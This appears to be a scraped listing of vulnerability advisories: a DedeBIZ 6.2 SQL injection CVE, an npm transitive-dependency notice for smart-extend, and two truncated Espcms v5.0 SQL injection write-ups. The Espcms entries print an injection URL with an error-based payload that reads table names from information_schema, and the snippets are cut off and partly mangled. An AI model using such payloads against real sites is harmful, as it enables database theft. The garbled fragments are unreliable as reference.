CVE-2023-5268

A vulnerability was found in DedeBIZ 6.2 and classified as critical. This issue affects some unknown processing of the file /src/admin/makehtmltaglistaction.php. The manipulation of the argument mktime leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to...

@planningcenter/icons (>=3.0.0-7 <=3.0.0-15), feathers-commands (>=0.0.1 <=0.1.4) +11 more potentially affected by unknown CVE via smart-extend (=1.7.4)

smart-extend NPM version =1.7.4 is affected by a known vulnerability. The following packages have a transitive dependency on smart-extend and may be impacted: - @planningcenter/icons =3.0.0-7, =0.0.1, =1.0.4, =1.0.2, =0.0.1, =1.0.0, =1.0.0, =1.0.2, =1.0.0, =0.1.0, =1.0.1, =2.0.0, =3.0.5 Source...

Espcms v5.0 /index.php SQL注入漏洞

构造www.xxx.cc/index.php?ac=search&at=taglist&tagkey=%2527,tags orselect 1 fromselect count,concatselect select concat0x7e,0x27,tablename,0x27,0x7e from informationschema.tables where tableschema=database limit 0,1,floorrand02x from informationschema.tables group by xa%23...

esp cms injection 0day-vulnerability warning-the black bar safety net

In urldecode the role of the non-filtered result in injection form interface/search.php ---- intaglist ---- $tagkey（ Urldecdoe after processing directly into SQL statement, the injection formedcode omitted Test: http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd%2 5 2 7,%2527dd%2 5 ...